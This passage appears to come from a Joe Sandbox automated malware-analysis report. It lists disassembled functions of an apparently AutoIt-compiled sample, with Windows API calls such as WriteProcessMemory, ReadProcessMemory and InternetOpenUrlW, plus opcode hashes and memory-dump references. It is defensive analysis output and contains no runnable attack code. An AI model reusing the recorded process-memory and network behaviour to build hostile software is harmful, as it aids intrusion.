                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 7d4b54e2f039ee4215908d8410217bcf631a4cfeabbe095e8d1ce97298a1dede
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 39a525bc613f0e7e9485e4ea944b13d532e73913c0a35fc25f8fa2b96209a7b9
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d4b54e2f039ee4215908d8410217bcf631a4cfeabbe095e8d1ce97298a1dede
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51F19F706083018BD714DF25C484A6BB7E5AF85314F64886FF885AB392D738EC55CB9B
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044F0B1 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 377COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _memcmp
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: '$[$h
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2931989736-1224472061
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c2eec353cbd26a418970a1643da97c958d9efd09d44d369c5aec2a2e92b02032
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EBE1B3756083858FE725CF28C8807ABBBE1FFC9304F18896EE89587341D7799849CB56
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044F1F5 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 358COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _strncmp
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: >$R$U
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 909875538-1924298640
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: f9ebc198af2ab7ab0819517e001d9756788144751dce64bc403378e3fae079f3
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: f6794502b7c89560a677b30a08de70cb8bc1b17d125f16f135907c58c8460d8d
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f9ebc198af2ab7ab0819517e001d9756788144751dce64bc403378e3fae079f3
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46E19C745083818FEB25CF29C49076BBBE1EFD9304F28496EE89587381D378E849CB56
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046CDA0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                                                                                                                                                                                                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 0046CE18
                                                                                                                                                                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
                                                                                                                                                                                                                                                                                                                                                                                                                • CoUninitialize.OLE32 ref: 0046CE50
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: .lnk
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 886957087-24824748
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 09ec1e36491b9dee8eccbfa157b0fc1a83632a56aae6c10d58f94140378ad3aa
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3A1ABB5A042019FC704EF64C980E6BB7E9EF88714F14895EF8849B392D735EC45CBA6
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00469BED Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 219COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00469C37
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 176396367-557222456
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 5ec49088f7a0f5eff408c40ec761cfb1cab3d77d8e9f1d748350f88cc39ab646
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C818F715183009FC310EF65C88186BB7E8AF85714F408A2FF5959B2A2E778ED45CB9B
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0042D2CC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 204COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 0042D2E0
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 0042D2EE
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(00000000), ref: 0042D2FF
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Variant$ClearCopyInit_malloc
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 4RH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2981388473-749298218
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 4f5dbf7d09d6609eea61bad343ccdb5a393d5a012301d28101c94dc94e671a2c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 2430bd0654d197d786bc988f6f01769df72c779a088326c60667d263ff95ce9f
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f5dbf7d09d6609eea61bad343ccdb5a393d5a012301d28101c94dc94e671a2c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC913874A083519FC720CF29D480A1AB7E1FF89304F64892EE999DB351D774EC85CB96
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004667A7 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 170shareCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsnicmp.LIBCMT ref: 0046681A
                                                                                                                                                                                                                                                                                                                                                                                                                • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 004668B9
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: LPT$HH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3035604524-2728063697
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 2945cb5b31277d8c8021d55f3d7ec86f9f5d8a101f6134c00f702d091f19bef7
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 32c7950bcbaa764ae6d62266904c1b9f72d26d84b6ae022b5f72856ccecd4d84
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2945cb5b31277d8c8021d55f3d7ec86f9f5d8a101f6134c00f702d091f19bef7
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2151D5B16043009FC720EF65C881B1BB7E5AF85704F11491EFA859B382E779ED49C79A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00438A5D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004374AF: WriteProcessMemory.KERNEL32(?,?,00000000,00000000,00000000,?,00461142,?), ref: 004374E2
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00438AB8
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00437472: ReadProcessMemory.KERNEL32(?,00000000,00000000,?,00000000,00000000,00460C33,?,00000000,?,00000202), ref: 004374A5
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00438B2F
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 00438BAF
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$MemoryProcess$ReadWrite
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4055202900-2766056989
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 682097a2b5231093ce935cfc9f6f49684b756042c0be5430c67da702d62f7190
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6518FB2208304ABD310DB64CC81FEFB7A9EFC9714F04591EFA8597181D678F9498B66
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00465D41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119networkCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CrackInternet_memset_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: |
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 915713708-2343686810
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 59fb16093b155e5aebf0565036b17e76eaaa1a90c891d08183ce313382d628e9
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE417EB2754301ABD204EF69DC81B9BF7E8FB88714F00052EF64593290DB75E909CBA6
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044A7DC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116networkCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A7FE
                                                                                                                                                                                                                                                                                                                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A851
                                                                                                                                                                                                                                                                                                                                                                                                                • HttpQueryInfoW.WININET ref: 0044A892
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3705125965-3916222277
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e2ea4e726a01332d61d4ddbc0b4be6fd5f15ca60b5c099a75bcf819f780d651a
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F431C6B56813416BE320EB16DC42F9FB7E8EFD9714F00091FF65057281D7A8A50D876A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004509D1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00450A84
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00450AA2
                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00450AB3
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$Long
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: SysTreeView32
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 1ec52148e0427fd314aa46f8515fbaae5756f8dde681787cc4d1a4a364837cef
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9831E670244301AFE710DB64CC84B6BB3E8EF98325F104A1EF9A5932D1D7B8AD85CB25
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00437CA6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 00437CB2
                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00437D26
                                                                                                                                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,AU3_GetPluginDetails), ref: 00437D3D
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
